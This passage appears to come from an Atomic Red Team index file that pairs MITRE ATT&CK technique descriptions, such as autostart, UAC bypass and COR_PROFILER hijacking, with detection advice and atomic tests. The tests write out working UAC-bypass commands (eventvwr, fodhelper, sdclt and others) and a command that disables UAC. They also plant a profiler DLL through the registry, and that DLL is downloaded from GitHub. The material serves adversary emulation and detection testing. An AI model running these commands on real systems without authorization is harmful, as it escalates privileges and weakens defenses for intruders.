Support + Provider DLLs. Retrieved March 1, 2017. + source_name: Graeber 2014 + - url: https://technet.microsoft.com/en-us/library/dn408187.aspx + description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. + Retrieved June 24, 2015. 
+ source_name: Microsoft Configure LSA + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:11:25.821Z' + created: '2020-01-24T14:54:42.757Z' + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys. + Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 + R2 may generate events when unsigned DLLs try to load into the LSA by setting + the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber + 2014) (Citation: Microsoft Configure LSA)' + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1547: + technique: + id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf + description: |- + Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. 
+ + Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. + name: Boot or Logon Autostart Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547 + url: https://attack.mitre.org/techniques/T1547 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html + - url: http://msdn.microsoft.com/en-us/library/aa376977 + description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November + 12, 2014. + source_name: Microsoft Run Key + - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx + description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, + 2017. + source_name: MSDN Authentication Packages + - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx + description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. + source_name: Microsoft TimeProvider + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + - source_name: Linux Kernel Programming + url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf + description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel + Module Programming Guide. Retrieved April 6, 2018. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-24T13:50:12.837Z' + created: '2020-01-23T17:46:59.535Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_detection: "Monitor for additions or modifications of mechanisms that + could be used to trigger autostart execution, such as relevant additions to + the Registry. Look for changes that are not correlated with known updates, + patches, or other planned administrative activity. Tools such as Sysinternals + Autoruns may also be used to detect system autostart configuration changes + that could be attempts at persistence.(Citation: TechNet Autoruns) Changes + to some autostart configuration settings may happen under normal conditions + when legitimate software is installed. \n\nSuspicious program execution as + autostart programs may show up as outlier processes that have not been seen + before when compared against historical data.To increase confidence of malicious + activity, data and events should not be viewed in isolation, but as part of + a chain of behavior that could lead to other activities, such as network connections + made for Command and Control, learning details about the environment through + Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically + looking for DLLs that are not recognized or not normally loaded into a process. + Look for abnormal process behavior that may be due to a process loading a + malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line + parameters involved in kernel modification or driver installation." 
+ x_mitre_permissions_required: + - User + - Administrator + - root + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'File: File Creation' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Kernel: Kernel Module Load' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + atomic_tests: [] + T1037: + technique: + id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Boot or Logon Initialization Scripts + description: "Adversaries may use scripts automatically executed at boot or + logon initialization to establish persistence. Initialization scripts can + be used to perform administrative functions, which may often execute other + programs or send information to an internal logging server. These scripts + can vary based on operating system and whether applied locally or remotely. + \ \n\nAdversaries may use these scripts to maintain persistence on a single + system. Depending on the access configuration of the logon scripts, either + local credentials or an administrator account may be necessary. \n\nAn adversary + may also be able to escalate their privileges since some boot or logon initialization + scripts run with higher privileges." 
+ external_references: + - source_name: mitre-attack + external_id: T1037 + url: https://attack.mitre.org/techniques/T1037 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-27T19:58:02.332Z' + created: '2017-05-31T21:30:38.910Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - macOS + - Windows + - Linux + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_version: '2.1' + atomic_tests: [] + T1548.002: + technique: + created: '2020-01-30T14:24:34.977Z' + modified: '2020-07-22T21:36:52.458Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1548.002 + url: https://attack.mitre.org/techniques/T1548/002 + - url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works + description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved + June 3, 2016. 
+ source_name: TechNet How UAC Works + - url: https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx + description: 'Russinovich, M. (2009, July). User Account Control: Inside Windows + 7 User Account Control. Retrieved July 26, 2016.' + source_name: TechNet Inside UAC + - url: https://msdn.microsoft.com/en-us/library/ms679687.aspx + description: Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July + 26, 2016. + source_name: MSDN COM Elevation + - url: http://www.pretentiousname.com/misc/win7_uac_whitelist2.html + description: Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November + 12, 2014. + source_name: Davidson Windows + - url: https://github.com/hfiref0x/UACME + description: UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. + source_name: Github UACMe + - url: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + description: Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe + and Registry Hijacking. Retrieved December 27, 2016. + source_name: enigma0x3 Fileless UAC Bypass + - url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware + description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses + UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. + source_name: Fortinet Fareit + - url: http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass + description: Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June + 3, 2016. + source_name: SANS UAC Bypass + - url: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ + description: Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved + May 25, 2017. + source_name: enigma0x3 sdclt app paths + - url: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ + description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. 
+ Retrieved May 25, 2017. + source_name: enigma0x3 sdclt bypass + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Bypass User Account Control + description: |- + Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) + + If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) + + Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. 
Additional bypass methods are regularly discovered and some used in the wild, such as: + + * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) + + Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) + id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 + x_mitre_defense_bypassed: + - Windows User Account Control + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - Administrator + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. + + Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. 
For example: + + * The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass) + + * The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass) + + Analysts should monitor these Registry settings for unauthorized changes. + x_mitre_data_sources: + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_contributors: + - Stefan Kanthak + - Casey Smith + x_mitre_platforms: + - Windows + identifier: T1548.002 + atomic_tests: + - name: Bypass UAC using Event Viewer (cmd) + auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 + description: | + Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + Upon execution command prompt should be launched with administrative privelages + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f + cmd.exe /c eventvwr.msc + cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 + +' + name: command_prompt + - name: Bypass UAC using Event Viewer (PowerShell) + auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b + description: | + PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. 
More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + Upon execution command prompt should be launched with administrative privelages + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force + Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\eventvwr.msc" + cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse + -ErrorAction Ignore + +' + name: powershell + - name: Bypass UAC using Fodhelper + auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 + description: | + Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f + fodhelper.exe + cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul + 2>&1 + +' + name: command_prompt + - name: Bypass UAC using Fodhelper - PowerShell + auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa + description: | + PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + Upon execution command prompt will be opened. 
+ supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force + New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force + Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\fodhelper.exe" + cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force + -Recurse -ErrorAction Ignore + +' + name: powershell + - name: Bypass UAC using ComputerDefaults (PowerShell) + auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f + description: | + PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 + Upon execution administrative command prompt should open + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force + New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force + Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\ComputerDefaults.exe" + cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force + -Recurse -ErrorAction Ignore + +' + name: powershell + elevation_required: true + - name: Bypass UAC by Mocking Trusted Directories + auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1 + description: | + Creates a fake "trusted directory" and copies a binary to bypass UAC. 
The UAC bypass may not work on fully patched systems + Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + mkdir "\\?\C:\Windows \System32\" + copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe" + mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe" + cleanup_command: | + rd "\\?\C:\Windows \" /S /Q >nul 2>nul + del "c:\testbypass.exe" >nul 2>nul + name: command_prompt + elevation_required: true + - name: Bypass UAC using sdclt DelegateExecute + auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 + description: | + Bypasses User Account Control using a fileless method, registry only. + Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe + [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) + Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) + supported_platforms: + - windows + input_arguments: + command.to.execute: + description: Command to execute + type: string + default: cmd.exe /c notepad.exe + executor: + command: | + New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}' + New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" + Start-Process -FilePath $env:windir\system32\sdclt.exe + Start-Sleep -s 3 + cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse + -Force -ErrorAction Ignore + +' + name: powershell + - name: Disable UAC using reg.exe + auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + description: | + Disable 
User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key + HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + supported_platforms: + - windows + executor: + command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 1 /f + +' + name: command_prompt + elevation_required: true + T1574.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.012 + url: https://attack.mitre.org/techniques/T1574/012 + - source_name: Microsoft Profiling Mar 2017 + url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview + description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June + 24, 2020. + - source_name: Microsoft COR_PROFILER Feb 2013 + url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100) + description: Microsoft. (2013, February 4). Registry-Free Profiler Startup + and Attach. Retrieved June 24, 2020. + - source_name: RedCanary Mockingbird May 2020 + url: https://redcanary.com/blog/blue-mockingbird-cryptominer/ + description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved + May 26, 2020. + - source_name: Red Canary COR_PROFILER May 2020 + url: https://redcanary.com/blog/cor_profiler-for-persistence/ + description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation + for persistence. Retrieved June 24, 2020. + - source_name: Almond COR_PROFILER Apr 2019 + url: https://offsec.almond.consulting/UAC-bypass-dotnet.html + description: Almond. (2019, April 30). UAC bypass via elevated .NET applications. + Retrieved June 24, 2020. + - source_name: GitHub OmerYa Invisi-Shell + url: https://github.com/OmerYa/Invisi-Shell + description: Yair, O. (2019, August 19). 
Invisi-Shell. Retrieved June 24, + 2020. + - source_name: subTee .NET Profilers May 2017 + url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html + description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET + Profilers. Retrieved June 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: COR_PROFILER + description: |- + Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) + + The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) + + Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. 
The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) + id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-06-26T16:09:58.920Z' + created: '2020-06-24T22:30:55.843Z' + x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER, + monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and + COR_PROFILER_PATH that correspond to system and user environment variables + that do not correlate to known developer tools. Extra scrutiny should be placed + on suspicious modification of these Registry keys by command line tools like + wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring + for command-line arguments indicating a change to COR_PROFILER variables may + aid in detection. For system, user, and process scope abuse of the COR_PROFILER, + monitor for new suspicious unmanaged profiling DLLs loading into .NET processes + shortly after the CLR causing abnormal process behavior.(Citation: Red Canary + COR_PROFILER May 2020) Consider monitoring for DLL files that are associated + with COR_PROFILER environment variables.' 
+ x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_contributors: + - Jesse Brown, Red Canary + x_mitre_platforms: + - Windows + identifier: T1574.012 + atomic_tests: + - name: User scope COR_PROFILER + auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + description: | + Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). + The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. + Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. + If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, + the notepad process will not execute with high integrity. 
+ + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan + New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + Write-Host "executing eventvwr.msc" -ForegroundColor Cyan + START MMC.EXE EVENTVWR.MSC + cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" + -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment + -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty + -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore + | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" + -Force -ErrorAction Ignore | Out-Null\n" + name: powershell 
+ - name: System Scope COR_PROFILER + auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 + description: | + Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. + The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity + level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will + still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating system environment variables" -ForegroundColor Cyan + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path 
'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + cleanup_command: | + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null + name: powershell + elevation_required: true + - name: Registry-free process scope COR_PROFILER + auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 + description: | + Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. 
